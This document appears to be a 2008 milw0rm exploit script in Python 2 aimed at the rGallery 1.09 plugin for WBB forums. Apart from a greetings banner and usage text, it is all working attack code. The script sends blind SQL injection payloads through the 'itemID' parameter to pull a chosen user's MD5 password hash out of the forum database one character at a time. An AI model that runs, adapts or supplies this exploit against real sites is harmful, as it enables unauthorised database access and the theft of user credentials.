WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection

import sys, urllib2, re

print "\n "
print "                          \\#'#/                        "
print "                          (-.-)                         "
print "  -------------------oOO---(_)---OOo--------------------"
print "  |   rGallery 1.09 (+-) Exploit by Five-Three-Nine    |"
print "  |  Using Blind SQL Injection in 'itemID' of rGallery |"
print "  |                                                    |"
print "  |                Greets and Shouts to:               |"
print "  | tmh, n00bor, activebeta, Ghost, Saufkumpel, Altair |"  
print "  | crusader727, Nemo, Loader007, J0hn.X3r, sNiper109  |"                                      
print "  ------------------------------------------------------\n"


if len(sys.argv) != 5:
	print "\nUsage: ./rGallery.py <UserID> <UserTable> <ImageID> <site>"
	print "Ex: ./rGallery.py 1 bb1_users 19 http://example.com\n"
	sys.exit(1)

UserID = sys.argv[1]
Prefix = sys.argv[2]
ImageID = sys.argv[3]
Host = sys.argv[4]

Res = [48,49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102]
MD5 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32]
Hash = ""

UserID = int(UserID)
UserID -= 1
UserID = str(UserID)

for MD5Count in range(32):
	for ResCount in range(16):
		try:
			source = urllib2.urlopen(Host +"/index.php?page=RGalleryImageWrapper&itemID=" + ImageID +"%20and%20ascii(substring((SELECT%20password%20from%20" + Prefix +"%20limit%20"+ UserID + ",1)," + str(MD5Count + 1) + ",1))="+ str(Res[ResCount])).read()
			
			print "[+] Character " + str(MD5Count + 1) +  " found! " + str(Res[ResCount])
			MD5[MD5Count] = Res[ResCount]
			break
		except(urllib2.URLError):
			continue 
		except(urllib2.HTTPError):
			print "[+] Error: Can't load the Site"
			sys.exit(1)


for i in MD5:
	Hash = Hash + str(chr(i))
	
print "\n[+] Hash: " + Hash

# milw0rm.com [2008-10-20]